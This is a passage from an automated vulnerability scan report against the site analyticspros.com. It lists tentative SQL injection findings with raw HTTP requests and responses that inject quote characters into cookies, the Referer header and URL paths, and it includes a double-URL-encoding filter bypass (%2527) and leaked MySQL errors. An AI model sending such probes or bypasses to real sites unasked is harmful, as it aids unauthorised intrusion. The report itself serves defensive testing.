Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Component not found
Date: Sat, 06 Nov 2010 06:23:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 06 Nov 2010 06:23:13 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<title>404 - Error: 404</title>
...[SNIP]...

Request 2

GET /blog''/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:23:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.79. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html [__utmmobile cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c';

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:18:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c'';

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:18:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.80. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html [optimizelyEndUserId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

Issue detail

The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169';

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:14:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169'';

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:14:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:14:07 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:14:07 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34465


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.81. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [7876d45a49f537da76cfb9e129203eee cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/103-google-analytics-opt-out-feature.html

Issue detail

The 7876d45a49f537da76cfb9e129203eee cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 7876d45a49f537da76cfb9e129203eee cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the 7876d45a49f537da76cfb9e129203eee cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:10:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef%2527%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:10:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:10:38 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:10:39 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.82. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/103-google-analytics-opt-out-feature.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 01:12:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 01:12:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:12:04 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 01:12:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33583


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.83. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [apros2.0_tpl cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/103-google-analytics-opt-out-feature.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0'; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:12:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0''; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:12:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.84. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [optimizelyBuckets cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/103-google-analytics-opt-out-feature.html

Issue detail

The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D'; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:06:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D''; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:06:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.85. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/106-google-analytics-health-check.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/106-google-analytics-health-check.html%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:22:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
